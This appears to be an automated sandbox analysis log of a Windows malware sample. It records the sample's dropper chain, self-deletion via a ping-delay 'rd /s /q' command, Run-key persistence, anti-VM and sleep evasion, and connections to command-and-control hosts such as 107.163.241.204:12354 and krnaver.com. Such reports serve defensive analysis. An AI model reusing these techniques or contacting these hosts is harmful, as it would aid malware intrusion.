Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\mszcy.exe C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\XgijTrY6No.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\XgijTrY6No.exe Section loaded: mfc42.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Section loaded: mfc42.dll
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*.** source: rundll32.exe, 00000006.00000003.3597257344.0000000000D03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rod.pdb\*.** source: rundll32.exe, 00000006.00000003.1813794875.0000000000D3D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1813762319.0000000000D34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.** source: rundll32.exe, 00000006.00000003.2262348463.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.**e source: rundll32.exe, 00000006.00000003.1572496969.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1572330291.0000000000D46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: rundll32.exe, 00000006.00000003.2262330522.0000000000D42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000006.00000003.3597257344.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.**.*** source: rundll32.exe, 00000006.00000003.3031707203.0000000005B50000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary, 6_2_100051B0
Source: initial sample Static PE information: section where entry point is pointing to: GDR
Source: rjqzr.dll.5.dr Static PE information: real checksum: 0x10fa9 should be: 0xeaf9
Source: XgijTrY6No.exe Static PE information: real checksum: 0x0 should be: 0x25335
Source: mszcy.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x1595f
Source: XgijTrY6No.exe Static PE information: section name: .CG
Source: XgijTrY6No.exe Static PE information: section name: .adata
Source: mszcy.exe.0.dr Static PE information: section name: .CG
Source: mszcy.exe.0.dr Static PE information: section name: .adata
Source: rjqzr.dll.5.dr Static PE information: section name: GDR
Source: C:\Users\user\Desktop\XgijTrY6No.exe Code function: 0_2_0041400A push ebp; ret 0_2_0041400D
Source: C:\Users\user\Desktop\XgijTrY6No.exe Code function: 0_2_00414014 push 00000000h; ret 0_2_00414425
Source: C:\Users\user\Desktop\XgijTrY6No.exe Code function: 0_2_00402EE0 push eax; ret 0_2_00402F0E
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Code function: 5_2_0041400A push ebp; ret 5_2_0041400D
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Code function: 5_2_00414014 push 00000000h; ret 5_2_00414425
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Code function: 5_2_00402EE0 push eax; ret 5_2_00402F0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10010F90 push eax; ret 6_2_10010FBE
Source: rjqzr.dll.5.dr Static PE information: section name: .text entropy: 7.9944271829324975
Source: rjqzr.dll.5.dr Static PE information: section name: .rsrc entropy: 7.3301358156247804

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\rundll32.exe Code function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d 6_2_1000C230
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe File created: C:\ftelcs\rjqzr.dll
Source: C:\Users\user\Desktop\XgijTrY6No.exe File created: C:\Users\user\AppData\Local\Temp\mszcy.exe
Source: C:\Windows\SysWOW64\rundll32.exe File created: c:\ftelcs\ReadMe.txt

Boot Survival

Source: C:\Windows\SysWOW64\rundll32.exe Code function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d 6_2_1000C230
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgr

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\mszcy.exe File deleted: c:\users\user\desktop\xgijtry6no.exe
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 12354
Source: C:\Users\user\Desktop\XgijTrY6No.exe Code function: 0_2_00402138 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379, 0_2_00402138
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Code function: 5_2_00402138 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379, 5_2_00402138
Source: C:\Users\user\Desktop\XgijTrY6No.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_6-5800
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 878Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 6157Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-6262
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-1054
Source: C:\Users\user\Desktop\XgijTrY6No.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-1055
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeDropped PE file which has not been started: C:\ftelcs\rjqzr.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-6015
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7612Thread sleep count: 878 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7612Thread sleep time: -8780000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7724Thread sleep count: 74 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7712Thread sleep time: -1200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7708Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7560Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7928Thread sleep count: 125 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7928Thread sleep time: -37500000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7920Thread sleep time: -1260000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7908Thread sleep time: -2400000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616Thread sleep time: -7200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7928Thread sleep count: 6157 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7928Thread sleep time: -1847100000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7560Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000B0A0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,rand,lstrcpy,lstrcat,lstrcat,_strcmpi,GetTickCount,srand,rand,rand,rand,rand,rand,rand,rand,rand,wsprintfA,wsprintfA,WinExec,Sleep,wsprintfA,Sleep,strchr,strchr,strchr,strchr,atoi,WinExec,DeleteFileA,Sleep,lstrcat,FindNextFileA,FindClose,6_2_1000B0A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100052A0 FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,6_2_100052A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100060E0 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,6_2_100060E0
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 3600000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: rundll32.exe, 00000006.00000003.1572438175.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1653072832.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3515855541.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2262348463.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3597257344.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2422989775.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3758155005.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2222059550.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000002.3802838449.00000000008AB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: s\Applications\\VMwareHox
Source: XgijTrY6No.exe, 00000000.00000002.1349290968.000000000057E000.00000004.00000020.00020000.00000000.sdmp, mszcy.exe, 00000005.00000002.1358415143.000000000081E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\XgijTrY6No.exe API call chain: ExitProcess graph end node graph_0-726
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe API call chain: ExitProcess graph end node graph_5-765
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_6-5805
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_8-344
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe Code function: 5_2_0040229F _EH_prolog,EnterCriticalSection,#540,SendMessageA,#3998,#6907,#6907,#2818,#6907,GetSystemTime,#2818,LdrInitializeThunk,#6907,LdrInitializeThunk,#6007,#823,#823,memcpy,LdrInitializeThunk,#6007,LeaveCriticalSection,#800, 5_2_0040229F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary, 6_2_100051B0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 202.108.0.52 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: krnaver.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 107.163.241.204 12354
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\mszcy.exe C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
